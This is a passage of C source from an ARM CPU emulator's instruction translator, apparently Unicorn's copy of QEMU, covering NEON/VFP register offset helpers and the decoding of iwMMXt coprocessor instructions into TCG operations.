offset = offsetof(CPUARMState, vfp.standard_fp_status); } else { offset = offsetof(CPUARMState, vfp.fp_status); } tcg_gen_addi_ptr(tcg_ctx, statusptr, tcg_ctx->cpu_env, offset); return statusptr; } static inline long vfp_reg_offset(bool dp, unsigned reg) { if (dp) { return offsetof(CPUARMState, vfp.zregs[reg >> 1].d[reg & 1]); } else { long ofs = offsetof(CPUARMState, vfp.zregs[reg >> 2].d[(reg >> 1) & 1]); if (reg & 1) { ofs += offsetof(CPU_DoubleU, l.upper); } else { ofs += offsetof(CPU_DoubleU, l.lower); } return ofs; } } /* Return the offset of a 32-bit piece of a NEON register. zero is the least significant end of the register. 
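 * E.g. pass 0 of D5 overlays S10 and pass 1 overlays S11 in the VFP
 * register file: the computation below is simply sreg = reg * 2 + n.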
*/ static inline long neon_reg_offset (int reg, int n) { int sreg; sreg = reg * 2 + n; return vfp_reg_offset(0, sreg); } /* Return the offset of a 2**SIZE piece of a NEON register, at index ELE, * where 0 is the least significant end of the register. */ static inline long neon_element_offset(int reg, int element, MemOp size) { int element_size = 1 << size; int ofs = element * element_size; #ifdef HOST_WORDS_BIGENDIAN /* Calculate the offset assuming fully little-endian, * then XOR to account for the order of the 8-byte units. */ if (element_size < 8) { ofs ^= 8 - element_size; } #endif return neon_reg_offset(reg, 0) + ofs; } static TCGv_i32 neon_load_reg(TCGContext *tcg_ctx, int reg, int pass) { TCGv_i32 tmp = tcg_temp_new_i32(tcg_ctx); tcg_gen_ld_i32(tcg_ctx, tmp, tcg_ctx->cpu_env, neon_reg_offset(reg, pass)); return tmp; } static void neon_load_element(TCGContext *tcg_ctx, TCGv_i32 var, int reg, int ele, MemOp mop) { long offset = neon_element_offset(reg, ele, mop & MO_SIZE); switch (mop) { case MO_UB: tcg_gen_ld8u_i32(tcg_ctx, var, tcg_ctx->cpu_env, offset); break; case MO_UW: tcg_gen_ld16u_i32(tcg_ctx, var, tcg_ctx->cpu_env, offset); break; case MO_UL: tcg_gen_ld_i32(tcg_ctx, var, tcg_ctx->cpu_env, offset); break; default: g_assert_not_reached(); break; } } static void neon_load_element64(TCGContext *tcg_ctx, TCGv_i64 var, int reg, int ele, MemOp mop) { long offset = neon_element_offset(reg, ele, mop & MO_SIZE); switch (mop) { case MO_UB: tcg_gen_ld8u_i64(tcg_ctx, var, tcg_ctx->cpu_env, offset); break; case MO_UW: tcg_gen_ld16u_i64(tcg_ctx, var, tcg_ctx->cpu_env, offset); break; case MO_UL: tcg_gen_ld32u_i64(tcg_ctx, var, tcg_ctx->cpu_env, offset); break; case MO_Q: tcg_gen_ld_i64(tcg_ctx, var, tcg_ctx->cpu_env, offset); break; default: g_assert_not_reached(); break; } } static void neon_store_reg(TCGContext *tcg_ctx, int reg, int pass, TCGv_i32 var) { tcg_gen_st_i32(tcg_ctx, var, tcg_ctx->cpu_env, neon_reg_offset(reg, pass)); tcg_temp_free_i32(tcg_ctx, var); } static void neon_store_element(TCGContext *tcg_ctx, int reg, int ele, MemOp size, TCGv_i32 var) { long offset = neon_element_offset(reg, ele, size); switch (size) { case MO_8: tcg_gen_st8_i32(tcg_ctx, var, tcg_ctx->cpu_env, offset); break; case MO_16: tcg_gen_st16_i32(tcg_ctx, var, tcg_ctx->cpu_env, offset); break; case MO_32: tcg_gen_st_i32(tcg_ctx, var, tcg_ctx->cpu_env, offset); break; default: g_assert_not_reached(); break; } } static void neon_store_element64(TCGContext *tcg_ctx, int reg, int ele, MemOp size, TCGv_i64 var) { long offset = neon_element_offset(reg, ele, size); switch (size) { case MO_8: tcg_gen_st8_i64(tcg_ctx, var, tcg_ctx->cpu_env, offset); break; case MO_16: tcg_gen_st16_i64(tcg_ctx, var, tcg_ctx->cpu_env, offset); break; case MO_32: tcg_gen_st32_i64(tcg_ctx, var, tcg_ctx->cpu_env, offset); break; case MO_64: tcg_gen_st_i64(tcg_ctx, var, tcg_ctx->cpu_env, offset); break; default: g_assert_not_reached(); break; } } static inline void neon_load_reg64(TCGContext *tcg_ctx, TCGv_i64 var, int reg) { tcg_gen_ld_i64(tcg_ctx, var, tcg_ctx->cpu_env, vfp_reg_offset(1, reg)); } static inline void neon_store_reg64(TCGContext *tcg_ctx, TCGv_i64 var, int reg) { tcg_gen_st_i64(tcg_ctx, var, tcg_ctx->cpu_env, vfp_reg_offset(1, reg)); } static inline void neon_load_reg32(TCGContext *tcg_ctx, TCGv_i32 var, int reg) { tcg_gen_ld_i32(tcg_ctx, var, tcg_ctx->cpu_env, vfp_reg_offset(false, reg)); } static inline void neon_store_reg32(TCGContext *tcg_ctx, TCGv_i32 var, int reg) { tcg_gen_st_i32(tcg_ctx, var, tcg_ctx->cpu_env, 
vfp_reg_offset(false, reg)); } static TCGv_ptr vfp_reg_ptr(TCGContext *tcg_ctx, bool dp, int reg) { TCGv_ptr ret = tcg_temp_new_ptr(tcg_ctx); tcg_gen_addi_ptr(tcg_ctx, ret, tcg_ctx->cpu_env, vfp_reg_offset(dp, reg)); return ret; } #define ARM_CP_RW_BIT (1 << 20) /* Include the VFP decoder */ #include "translate-vfp.inc.c" static inline void iwmmxt_load_reg(TCGContext *tcg_ctx, TCGv_i64 var, int reg) { tcg_gen_ld_i64(tcg_ctx, var, tcg_ctx->cpu_env, offsetof(CPUARMState, iwmmxt.regs[reg])); } static inline void iwmmxt_store_reg(TCGContext *tcg_ctx, TCGv_i64 var, int reg) { tcg_gen_st_i64(tcg_ctx, var, tcg_ctx->cpu_env, offsetof(CPUARMState, iwmmxt.regs[reg])); } static inline TCGv_i32 iwmmxt_load_creg(TCGContext *tcg_ctx, int reg) { TCGv_i32 var = tcg_temp_new_i32(tcg_ctx); tcg_gen_ld_i32(tcg_ctx, var, tcg_ctx->cpu_env, offsetof(CPUARMState, iwmmxt.cregs[reg])); return var; } static inline void iwmmxt_store_creg(TCGContext *tcg_ctx, int reg, TCGv_i32 var) { tcg_gen_st_i32(tcg_ctx, var, tcg_ctx->cpu_env, offsetof(CPUARMState, iwmmxt.cregs[reg])); tcg_temp_free_i32(tcg_ctx, var); } static inline void gen_op_iwmmxt_movq_wRn_M0(TCGContext *tcg_ctx, int rn) { iwmmxt_store_reg(tcg_ctx, tcg_ctx->cpu_M0, rn); } static inline void gen_op_iwmmxt_movq_M0_wRn(TCGContext *tcg_ctx, int rn) { iwmmxt_load_reg(tcg_ctx, tcg_ctx->cpu_M0, rn); } static inline void gen_op_iwmmxt_orq_M0_wRn(TCGContext *tcg_ctx, int rn) { iwmmxt_load_reg(tcg_ctx, tcg_ctx->cpu_V1, rn); tcg_gen_or_i64(tcg_ctx, tcg_ctx->cpu_M0, tcg_ctx->cpu_M0, tcg_ctx->cpu_V1); } static inline void gen_op_iwmmxt_andq_M0_wRn(TCGContext *tcg_ctx, int rn) { iwmmxt_load_reg(tcg_ctx, tcg_ctx->cpu_V1, rn); tcg_gen_and_i64(tcg_ctx, tcg_ctx->cpu_M0, tcg_ctx->cpu_M0, tcg_ctx->cpu_V1); } static inline void gen_op_iwmmxt_xorq_M0_wRn(TCGContext *tcg_ctx, int rn) { iwmmxt_load_reg(tcg_ctx, tcg_ctx->cpu_V1, rn); tcg_gen_xor_i64(tcg_ctx, tcg_ctx->cpu_M0, tcg_ctx->cpu_M0, tcg_ctx->cpu_V1); } #define IWMMXT_OP(name) \ static inline void gen_op_iwmmxt_##name##_M0_wRn(TCGContext *tcg_ctx, int rn) \ { \ iwmmxt_load_reg(tcg_ctx, tcg_ctx->cpu_V1, rn); \ gen_helper_iwmmxt_##name(tcg_ctx, tcg_ctx->cpu_M0, tcg_ctx->cpu_M0, tcg_ctx->cpu_V1); \ } #define IWMMXT_OP_ENV(name) \ static inline void gen_op_iwmmxt_##name##_M0_wRn(TCGContext *tcg_ctx, int rn) \ { \ iwmmxt_load_reg(tcg_ctx, tcg_ctx->cpu_V1, rn); \ gen_helper_iwmmxt_##name(tcg_ctx, tcg_ctx->cpu_M0, tcg_ctx->cpu_env, tcg_ctx->cpu_M0, tcg_ctx->cpu_V1); \ } #define IWMMXT_OP_ENV_SIZE(name) \ IWMMXT_OP_ENV(name##b) \ IWMMXT_OP_ENV(name##w) \ IWMMXT_OP_ENV(name##l) #define IWMMXT_OP_ENV1(name) \ static inline void gen_op_iwmmxt_##name##_M0(TCGContext *tcg_ctx) \ { \ gen_helper_iwmmxt_##name(tcg_ctx, tcg_ctx->cpu_M0, tcg_ctx->cpu_env, tcg_ctx->cpu_M0); \ } IWMMXT_OP(maddsq) IWMMXT_OP(madduq) IWMMXT_OP(sadb) IWMMXT_OP(sadw) IWMMXT_OP(mulslw) IWMMXT_OP(mulshw) IWMMXT_OP(mululw) IWMMXT_OP(muluhw) IWMMXT_OP(macsw) IWMMXT_OP(macuw) IWMMXT_OP_ENV_SIZE(unpackl) IWMMXT_OP_ENV_SIZE(unpackh) IWMMXT_OP_ENV1(unpacklub) IWMMXT_OP_ENV1(unpackluw) IWMMXT_OP_ENV1(unpacklul) IWMMXT_OP_ENV1(unpackhub) IWMMXT_OP_ENV1(unpackhuw) IWMMXT_OP_ENV1(unpackhul) IWMMXT_OP_ENV1(unpacklsb) IWMMXT_OP_ENV1(unpacklsw) IWMMXT_OP_ENV1(unpacklsl) IWMMXT_OP_ENV1(unpackhsb) IWMMXT_OP_ENV1(unpackhsw) IWMMXT_OP_ENV1(unpackhsl) IWMMXT_OP_ENV_SIZE(cmpeq) IWMMXT_OP_ENV_SIZE(cmpgtu) IWMMXT_OP_ENV_SIZE(cmpgts) IWMMXT_OP_ENV_SIZE(mins) IWMMXT_OP_ENV_SIZE(minu) IWMMXT_OP_ENV_SIZE(maxs) IWMMXT_OP_ENV_SIZE(maxu) IWMMXT_OP_ENV_SIZE(subn) IWMMXT_OP_ENV_SIZE(addn) 
IWMMXT_OP_ENV_SIZE(subu) IWMMXT_OP_ENV_SIZE(addu) IWMMXT_OP_ENV_SIZE(subs) IWMMXT_OP_ENV_SIZE(adds) IWMMXT_OP_ENV(avgb0) IWMMXT_OP_ENV(avgb1) IWMMXT_OP_ENV(avgw0) IWMMXT_OP_ENV(avgw1) IWMMXT_OP_ENV(packuw) IWMMXT_OP_ENV(packul) IWMMXT_OP_ENV(packuq) IWMMXT_OP_ENV(packsw) IWMMXT_OP_ENV(packsl) IWMMXT_OP_ENV(packsq) static void gen_op_iwmmxt_set_mup(TCGContext *tcg_ctx) { TCGv_i32 tmp; tmp = load_cpu_field(tcg_ctx, iwmmxt.cregs[ARM_IWMMXT_wCon]); tcg_gen_ori_i32(tcg_ctx, tmp, tmp, 2); store_cpu_field(tcg_ctx, tmp, iwmmxt.cregs[ARM_IWMMXT_wCon]); } static void gen_op_iwmmxt_set_cup(TCGContext *tcg_ctx) { TCGv_i32 tmp; tmp = load_cpu_field(tcg_ctx, iwmmxt.cregs[ARM_IWMMXT_wCon]); tcg_gen_ori_i32(tcg_ctx, tmp, tmp, 1); store_cpu_field(tcg_ctx, tmp, iwmmxt.cregs[ARM_IWMMXT_wCon]); } static void gen_op_iwmmxt_setpsr_nz(TCGContext *tcg_ctx) { TCGv_i32 tmp = tcg_temp_new_i32(tcg_ctx); gen_helper_iwmmxt_setpsr_nz(tcg_ctx, tmp, tcg_ctx->cpu_M0); store_cpu_field(tcg_ctx, tmp, iwmmxt.cregs[ARM_IWMMXT_wCASF]); } static inline void gen_op_iwmmxt_addl_M0_wRn(TCGContext *tcg_ctx, int rn) { iwmmxt_load_reg(tcg_ctx, tcg_ctx->cpu_V1, rn); tcg_gen_ext32u_i64(tcg_ctx, tcg_ctx->cpu_V1, tcg_ctx->cpu_V1); tcg_gen_add_i64(tcg_ctx, tcg_ctx->cpu_M0, tcg_ctx->cpu_M0, tcg_ctx->cpu_V1); } static inline int gen_iwmmxt_address(DisasContext *s, uint32_t insn, TCGv_i32 dest) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int rd; uint32_t offset; TCGv_i32 tmp; rd = (insn >> 16) & 0xf; tmp = load_reg(s, rd); offset = (insn & 0xff) << ((insn >> 7) & 2); if (insn & (1 << 24)) { /* Pre indexed */ if (insn & (1 << 23)) tcg_gen_addi_i32(tcg_ctx, tmp, tmp, offset); else #ifdef _MSC_VER tcg_gen_addi_i32(tcg_ctx, tmp, tmp, 0 - offset); #else tcg_gen_addi_i32(tcg_ctx, tmp, tmp, -offset); #endif tcg_gen_mov_i32(tcg_ctx, dest, tmp); if (insn & (1 << 21)) store_reg(s, rd, tmp); else tcg_temp_free_i32(tcg_ctx, tmp); } else if (insn & (1 << 21)) { /* Post indexed */ tcg_gen_mov_i32(tcg_ctx, dest, tmp); if (insn & (1 << 23)) tcg_gen_addi_i32(tcg_ctx, tmp, tmp, offset); else #ifdef _MSC_VER tcg_gen_addi_i32(tcg_ctx, tmp, tmp, 0 - offset); #else tcg_gen_addi_i32(tcg_ctx, tmp, tmp, -offset); #endif store_reg(s, rd, tmp); } else if (!(insn & (1 << 23))) return 1; return 0; } static inline int gen_iwmmxt_shift(TCGContext *tcg_ctx, uint32_t insn, uint32_t mask, TCGv_i32 dest) { int rd = (insn >> 0) & 0xf; TCGv_i32 tmp; if (insn & (1 << 8)) { if (rd < ARM_IWMMXT_wCGR0 || rd > ARM_IWMMXT_wCGR3) { return 1; } else { tmp = iwmmxt_load_creg(tcg_ctx, rd); } } else { tmp = tcg_temp_new_i32(tcg_ctx); iwmmxt_load_reg(tcg_ctx, tcg_ctx->cpu_V0, rd); tcg_gen_extrl_i64_i32(tcg_ctx, tmp, tcg_ctx->cpu_V0); } tcg_gen_andi_i32(tcg_ctx, tmp, tmp, mask); tcg_gen_mov_i32(tcg_ctx, dest, tmp); tcg_temp_free_i32(tcg_ctx, tmp); return 0; } /* Disassemble an iwMMXt instruction. Returns nonzero if an error occurred (ie. an undefined instruction). 
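 * A nonzero return is expected to make the caller raise UNDEF, so
 * encodings rejected here are not silently ignored.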
*/ static int disas_iwmmxt_insn(DisasContext *s, uint32_t insn) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int rd, wrd; int rdhi, rdlo, rd0, rd1, i; TCGv_i32 addr; TCGv_i32 tmp, tmp2, tmp3; if ((insn & 0x0e000e00) == 0x0c000000) { if ((insn & 0x0fe00ff0) == 0x0c400000) { wrd = insn & 0xf; rdlo = (insn >> 12) & 0xf; rdhi = (insn >> 16) & 0xf; if (insn & ARM_CP_RW_BIT) { /* TMRRC */ iwmmxt_load_reg(tcg_ctx, tcg_ctx->cpu_V0, wrd); tcg_gen_extrl_i64_i32(tcg_ctx, tcg_ctx->cpu_R[rdlo], tcg_ctx->cpu_V0); tcg_gen_extrh_i64_i32(tcg_ctx, tcg_ctx->cpu_R[rdhi], tcg_ctx->cpu_V0); } else { /* TMCRR */ tcg_gen_concat_i32_i64(tcg_ctx, tcg_ctx->cpu_V0, tcg_ctx->cpu_R[rdlo], tcg_ctx->cpu_R[rdhi]); iwmmxt_store_reg(tcg_ctx, tcg_ctx->cpu_V0, wrd); gen_op_iwmmxt_set_mup(tcg_ctx); } return 0; } wrd = (insn >> 12) & 0xf; addr = tcg_temp_new_i32(tcg_ctx); if (gen_iwmmxt_address(s, insn, addr)) { tcg_temp_free_i32(tcg_ctx, addr); return 1; } if (insn & ARM_CP_RW_BIT) { if ((insn >> 28) == 0xf) { /* WLDRW wCx */ tmp = tcg_temp_new_i32(tcg_ctx); gen_aa32_ld32u(s, tmp, addr, get_mem_index(s)); iwmmxt_store_creg(tcg_ctx, wrd, tmp); } else { i = 1; if (insn & (1 << 8)) { if (insn & (1 << 22)) { /* WLDRD */ gen_aa32_ld64(s, tcg_ctx->cpu_M0, addr, get_mem_index(s)); i = 0; } else { /* WLDRW wRd */ tmp = tcg_temp_new_i32(tcg_ctx); gen_aa32_ld32u(s, tmp, addr, get_mem_index(s)); } } else { tmp = tcg_temp_new_i32(tcg_ctx); if (insn & (1 << 22)) { /* WLDRH */ gen_aa32_ld16u(s, tmp, addr, get_mem_index(s)); } else { /* WLDRB */ gen_aa32_ld8u(s, tmp, addr, get_mem_index(s)); } } if (i) { tcg_gen_extu_i32_i64(tcg_ctx, tcg_ctx->cpu_M0, tmp); tcg_temp_free_i32(tcg_ctx, tmp); } gen_op_iwmmxt_movq_wRn_M0(tcg_ctx, wrd); } } else { if ((insn >> 28) == 0xf) { /* WSTRW wCx */ tmp = iwmmxt_load_creg(tcg_ctx, wrd); gen_aa32_st32(s, tmp, addr, get_mem_index(s)); } else { gen_op_iwmmxt_movq_M0_wRn(tcg_ctx, wrd); tmp = tcg_temp_new_i32(tcg_ctx); if (insn & (1 << 8)) { if (insn & (1 << 22)) { /* WSTRD */ gen_aa32_st64(s, tcg_ctx->cpu_M0, addr, get_mem_index(s)); } else { /* WSTRW wRd */ tcg_gen_extrl_i64_i32(tcg_ctx, tmp, tcg_ctx->cpu_M0); gen_aa32_st32(s, tmp, addr, get_mem_index(s)); } } else { if (insn & (1 << 22)) { /* WSTRH */ tcg_gen_extrl_i64_i32(tcg_ctx, tmp, tcg_ctx->cpu_M0); gen_aa32_st16(s, tmp, addr, get_mem_index(s)); } else { /* WSTRB */ tcg_gen_extrl_i64_i32(tcg_ctx, tmp, tcg_ctx->cpu_M0); gen_aa32_st8(s, tmp, addr, get_mem_index(s)); } } } tcg_temp_free_i32(tcg_ctx, tmp); } tcg_temp_free_i32(tcg_ctx, addr); return 0; } if ((insn & 0x0f000000) != 0x0e000000) return 1; switch (((insn >> 12) & 0xf00) | ((insn >> 4) & 0xff)) { case 0x000: /* WOR */ wrd = (insn >> 12) & 0xf; rd0 = (insn >> 0) & 0xf; rd1 = (insn >> 16) & 0xf; gen_op_iwmmxt_movq_M0_wRn(tcg_ctx, rd0); gen_op_iwmmxt_orq_M0_wRn(tcg_ctx, rd1); gen_op_iwmmxt_setpsr_nz(tcg_ctx); gen_op_iwmmxt_movq_wRn_M0(tcg_ctx, wrd); gen_op_iwmmxt_set_mup(tcg_ctx); gen_op_iwmmxt_set_cup(tcg_ctx); break; case 0x011: /* TMCR */ if (insn & 0xf) return 1; rd = (insn >> 12) & 0xf; wrd = (insn >> 16) & 0xf; switch (wrd) { case ARM_IWMMXT_wCID: case ARM_IWMMXT_wCASF: break; case ARM_IWMMXT_wCon: gen_op_iwmmxt_set_cup(tcg_ctx); /* Fall through. 
*/ case ARM_IWMMXT_wCSSF: tmp = iwmmxt_load_creg(tcg_ctx, wrd); tmp2 = load_reg(s, rd); tcg_gen_andc_i32(tcg_ctx, tmp, tmp, tmp2); tcg_temp_free_i32(tcg_ctx, tmp2); iwmmxt_store_creg(tcg_ctx, wrd, tmp); break; case ARM_IWMMXT_wCGR0: case ARM_IWMMXT_wCGR1: case ARM_IWMMXT_wCGR2: case ARM_IWMMXT_wCGR3: gen_op_iwmmxt_set_cup(tcg_ctx); tmp = load_reg(s, rd); iwmmxt_store_creg(tcg_ctx, wrd, tmp); break; default: return 1; } break; case 0x100: /* WXOR */ wrd = (insn >> 12) & 0xf; rd0 = (insn >> 0) & 0xf; rd1 = (insn >> 16) & 0xf; gen_op_iwmmxt_movq_M0_wRn(tcg_ctx, rd0); gen_op_iwmmxt_xorq_M0_wRn(tcg_ctx, rd1); gen_op_iwmmxt_setpsr_nz(tcg_ctx); gen_op_iwmmxt_movq_wRn_M0(tcg_ctx, wrd); gen_op_iwmmxt_set_mup(tcg_ctx); gen_op_iwmmxt_set_cup(tcg_ctx); break; case 0x111: /* TMRC */ if (insn & 0xf) return 1; rd = (insn >> 12) & 0xf; wrd = (insn >> 16) & 0xf; tmp = iwmmxt_load_creg(tcg_ctx, wrd); store_reg(s, rd, tmp); break; case 0x300: /* WANDN */ wrd = (insn >> 12) & 0xf; rd0 = (insn >> 0) & 0xf; rd1 = (insn >> 16) & 0xf; gen_op_iwmmxt_movq_M0_wRn(tcg_ctx, rd0); tcg_gen_neg_i64(tcg_ctx, tcg_ctx->cpu_M0, tcg_ctx->cpu_M0); gen_op_iwmmxt_andq_M0_wRn(tcg_ctx, rd1); gen_op_iwmmxt_setpsr_nz(tcg_ctx); gen_op_iwmmxt_movq_wRn_M0(tcg_ctx, wrd); gen_op_iwmmxt_set_mup(tcg_ctx); gen_op_iwmmxt_set_cup(tcg_ctx); break; case 0x200: /* WAND */ wrd = (insn >> 12) & 0xf; rd0 = (insn >> 0) & 0xf; rd1 = (insn >> 16) & 0xf; gen_op_iwmmxt_movq_M0_wRn(tcg_ctx, rd0); gen_op_iwmmxt_andq_M0_wRn(tcg_ctx, rd1); gen_op_iwmmxt_setpsr_nz(tcg_ctx); gen_op_iwmmxt_movq_wRn_M0(tcg_ctx, wrd); gen_op_iwmmxt_set_mup(tcg_ctx); gen_op_iwmmxt_set_cup(tcg_ctx); break; case 0x810: case 0xa10: /* WMADD */ wrd = (insn >> 12) & 0xf; rd0 = (insn >> 0) & 0xf; rd1 = (insn >> 16) & 0xf; gen_op_iwmmxt_movq_M0_wRn(tcg_ctx, rd0); if (insn & (1 << 21)) gen_op_iwmmxt_maddsq_M0_wRn(tcg_ctx, rd1); else gen_op_iwmmxt_madduq_M0_wRn(tcg_ctx, rd1); gen_op_iwmmxt_movq_wRn_M0(tcg_ctx, wrd); gen_op_iwmmxt_set_mup(tcg_ctx); break; case 0x10e: case 0x50e: case 0x90e: case 0xd0e: /* WUNPCKIL */ wrd = (insn >> 12) & 0xf; rd0 = (insn >> 16) & 0xf; rd1 = (insn >> 0) & 0xf; gen_op_iwmmxt_movq_M0_wRn(tcg_ctx, rd0); switch ((insn >> 22) & 3) { case 0: gen_op_iwmmxt_unpacklb_M0_wRn(tcg_ctx, rd1); break; case 1: gen_op_iwmmxt_unpacklw_M0_wRn(tcg_ctx, rd1); break; case 2: gen_op_iwmmxt_unpackll_M0_wRn(tcg_ctx, rd1); break; case 3: return 1; } gen_op_iwmmxt_movq_wRn_M0(tcg_ctx, wrd); gen_op_iwmmxt_set_mup(tcg_ctx); gen_op_iwmmxt_set_cup(tcg_ctx); break; case 0x10c: case 0x50c: case 0x90c: case 0xd0c: /* WUNPCKIH */ wrd = (insn >> 12) & 0xf; rd0 = (insn >> 16) & 0xf; rd1 = (insn >> 0) & 0xf; gen_op_iwmmxt_movq_M0_wRn(tcg_ctx, rd0); switch ((insn >> 22) & 3) { case 0: gen_op_iwmmxt_unpackhb_M0_wRn(tcg_ctx, rd1); break; case 1: gen_op_iwmmxt_unpackhw_M0_wRn(tcg_ctx, rd1); break; case 2: gen_op_iwmmxt_unpackhl_M0_wRn(tcg_ctx, rd1); break; case 3: return 1; } gen_op_iwmmxt_movq_wRn_M0(tcg_ctx, wrd); gen_op_iwmmxt_set_mup(tcg_ctx); gen_op_iwmmxt_set_cup(tcg_ctx); break; case 0x012: case 0x112: case 0x412: case 0x512: /* WSAD */ wrd = (insn >> 12) & 0xf; rd0 = (insn >> 16) & 0xf; rd1 = (insn >> 0) & 0xf; gen_op_iwmmxt_movq_M0_wRn(tcg_ctx, rd0); if (insn & (1 << 22)) gen_op_iwmmxt_sadw_M0_wRn(tcg_ctx, rd1); else gen_op_iwmmxt_sadb_M0_wRn(tcg_ctx, rd1); if (!(insn & (1 << 20))) gen_op_iwmmxt_addl_M0_wRn(tcg_ctx, wrd); gen_op_iwmmxt_movq_wRn_M0(tcg_ctx, wrd); gen_op_iwmmxt_set_mup(tcg_ctx); break; case 0x010: case 0x110: case 0x210: case 0x310: /* WMUL */ wrd = (insn >> 12) & 0xf; rd0 = 
(insn >> 16) & 0xf; rd1 = (insn >> 0) & 0xf; gen_op_iwmmxt_movq_M0_wRn(tcg_ctx, rd0); if (insn & (1 << 21)) { if (insn & (1 << 20)) gen_op_iwmmxt_mulshw_M0_wRn(tcg_ctx, rd1); else gen_op_iwmmxt_mulslw_M0_wRn(tcg_ctx, rd1); } else { if (insn & (1 << 20)) gen_op_iwmmxt_muluhw_M0_wRn(tcg_ctx, rd1); else gen_op_iwmmxt_mululw_M0_wRn(tcg_ctx, rd1); } gen_op_iwmmxt_movq_wRn_M0(tcg_ctx, wrd); gen_op_iwmmxt_set_mup(tcg_ctx); break; case 0x410: case 0x510: case 0x610: case 0x710: /* WMAC */ wrd = (insn >> 12) & 0xf; rd0 = (insn >> 16) & 0xf; rd1 = (insn >> 0) & 0xf; gen_op_iwmmxt_movq_M0_wRn(tcg_ctx, rd0); if (insn & (1 << 21)) gen_op_iwmmxt_macsw_M0_wRn(tcg_ctx, rd1); else gen_op_iwmmxt_macuw_M0_wRn(tcg_ctx, rd1); if (!(insn & (1 << 20))) { iwmmxt_load_reg(tcg_ctx, tcg_ctx->cpu_V1, wrd); tcg_gen_add_i64(tcg_ctx, tcg_ctx->cpu_M0, tcg_ctx->cpu_M0, tcg_ctx->cpu_V1); } gen_op_iwmmxt_movq_wRn_M0(tcg_ctx, wrd); gen_op_iwmmxt_set_mup(tcg_ctx); break; case 0x006: case 0x406: case 0x806: case 0xc06: /* WCMPEQ */ wrd = (insn >> 12) & 0xf; rd0 = (insn >> 16) & 0xf; rd1 = (insn >> 0) & 0xf; gen_op_iwmmxt_movq_M0_wRn(tcg_ctx, rd0); switch ((insn >> 22) & 3) { case 0: gen_op_iwmmxt_cmpeqb_M0_wRn(tcg_ctx, rd1); break; case 1: gen_op_iwmmxt_cmpeqw_M0_wRn(tcg_ctx, rd1); break; case 2: gen_op_iwmmxt_cmpeql_M0_wRn(tcg_ctx, rd1); break; case 3: return 1; } gen_op_iwmmxt_movq_wRn_M0(tcg_ctx, wrd); gen_op_iwmmxt_set_mup(tcg_ctx); gen_op_iwmmxt_set_cup(tcg_ctx); break; case 0x800: case 0x900: case 0xc00: case 0xd00: /* WAVG2 */ wrd = (insn >> 12) & 0xf; rd0 = (insn >> 16) & 0xf; rd1 = (insn >> 0) & 0xf; gen_op_iwmmxt_movq_M0_wRn(tcg_ctx, rd0); if (insn & (1 << 22)) { if (insn & (1 << 20)) gen_op_iwmmxt_avgw1_M0_wRn(tcg_ctx, rd1); else gen_op_iwmmxt_avgw0_M0_wRn(tcg_ctx, rd1); } else { if (insn & (1 << 20)) gen_op_iwmmxt_avgb1_M0_wRn(tcg_ctx, rd1); else gen_op_iwmmxt_avgb0_M0_wRn(tcg_ctx, rd1); } gen_op_iwmmxt_movq_wRn_M0(tcg_ctx, wrd); gen_op_iwmmxt_set_mup(tcg_ctx); gen_op_iwmmxt_set_cup(tcg_ctx); break; case 0x802: case 0x902: case 0xa02: case 0xb02: /* WALIGNR */ wrd = (insn >> 12) & 0xf; rd0 = (insn >> 16) & 0xf; rd1 = (insn >> 0) & 0xf; gen_op_iwmmxt_movq_M0_wRn(tcg_ctx, rd0); tmp = iwmmxt_load_creg(tcg_ctx, ARM_IWMMXT_wCGR0 + ((insn >> 20) & 3)); tcg_gen_andi_i32(tcg_ctx, tmp, tmp, 7); iwmmxt_load_reg(tcg_ctx, tcg_ctx->cpu_V1, rd1); gen_helper_iwmmxt_align(tcg_ctx, tcg_ctx->cpu_M0, tcg_ctx->cpu_M0, tcg_ctx->cpu_V1, tmp); tcg_temp_free_i32(tcg_ctx, tmp); gen_op_iwmmxt_movq_wRn_M0(tcg_ctx, wrd); gen_op_iwmmxt_set_mup(tcg_ctx); break; case 0x601: case 0x605: case 0x609: case 0x60d: /* TINSR */ if (((insn >> 6) & 3) == 3) return 1; rd = (insn >> 12) & 0xf; wrd = (insn >> 16) & 0xf; tmp = load_reg(s, rd); gen_op_iwmmxt_movq_M0_wRn(tcg_ctx, wrd); switch ((insn >> 6) & 3) { case 0: tmp2 = tcg_const_i32(tcg_ctx, 0xff); tmp3 = tcg_const_i32(tcg_ctx, (insn & 7) << 3); break; case 1: tmp2 = tcg_const_i32(tcg_ctx, 0xffff); tmp3 = tcg_const_i32(tcg_ctx, (insn & 3) << 4); break; case 2: tmp2 = tcg_const_i32(tcg_ctx, 0xffffffff); tmp3 = tcg_const_i32(tcg_ctx, (insn & 1) << 5); break; default: tmp2 = NULL; tmp3 = NULL; } gen_helper_iwmmxt_insr(tcg_ctx, tcg_ctx->cpu_M0, tcg_ctx->cpu_M0, tmp, tmp2, tmp3); tcg_temp_free_i32(tcg_ctx, tmp3); tcg_temp_free_i32(tcg_ctx, tmp2); tcg_temp_free_i32(tcg_ctx, tmp); gen_op_iwmmxt_movq_wRn_M0(tcg_ctx, wrd); gen_op_iwmmxt_set_mup(tcg_ctx); break; case 0x107: case 0x507: case 0x907: case 0xd07: /* TEXTRM */ rd = (insn >> 12) & 0xf; wrd = (insn >> 16) & 0xf; if (rd == 15 || ((insn >> 22) & 3) == 3) 
return 1; gen_op_iwmmxt_movq_M0_wRn(tcg_ctx, wrd); tmp = tcg_temp_new_i32(tcg_ctx); switch ((insn >> 22) & 3) { case 0: tcg_gen_shri_i64(tcg_ctx, tcg_ctx->cpu_M0, tcg_ctx->cpu_M0, (insn & 7) << 3); tcg_gen_extrl_i64_i32(tcg_ctx, tmp, tcg_ctx->cpu_M0); if (insn & 8) { tcg_gen_ext8s_i32(tcg_ctx, tmp, tmp); } else { tcg_gen_andi_i32(tcg_ctx, tmp, tmp, 0xff); } break; case 1: tcg_gen_shri_i64(tcg_ctx, tcg_ctx->cpu_M0, tcg_ctx->cpu_M0, (insn & 3) << 4); tcg_gen_extrl_i64_i32(tcg_ctx, tmp, tcg_ctx->cpu_M0); if (insn & 8) { tcg_gen_ext16s_i32(tcg_ctx, tmp, tmp); } else { tcg_gen_andi_i32(tcg_ctx, tmp, tmp, 0xffff); } break; case 2: tcg_gen_shri_i64(tcg_ctx, tcg_ctx->cpu_M0, tcg_ctx->cpu_M0, (insn & 1) << 5); tcg_gen_extrl_i64_i32(tcg_ctx, tmp, tcg_ctx->cpu_M0); break; } store_reg(s, rd, tmp); break; case 0x117: case 0x517: case 0x917: case 0xd17: /* TEXTRC */ if ((insn & 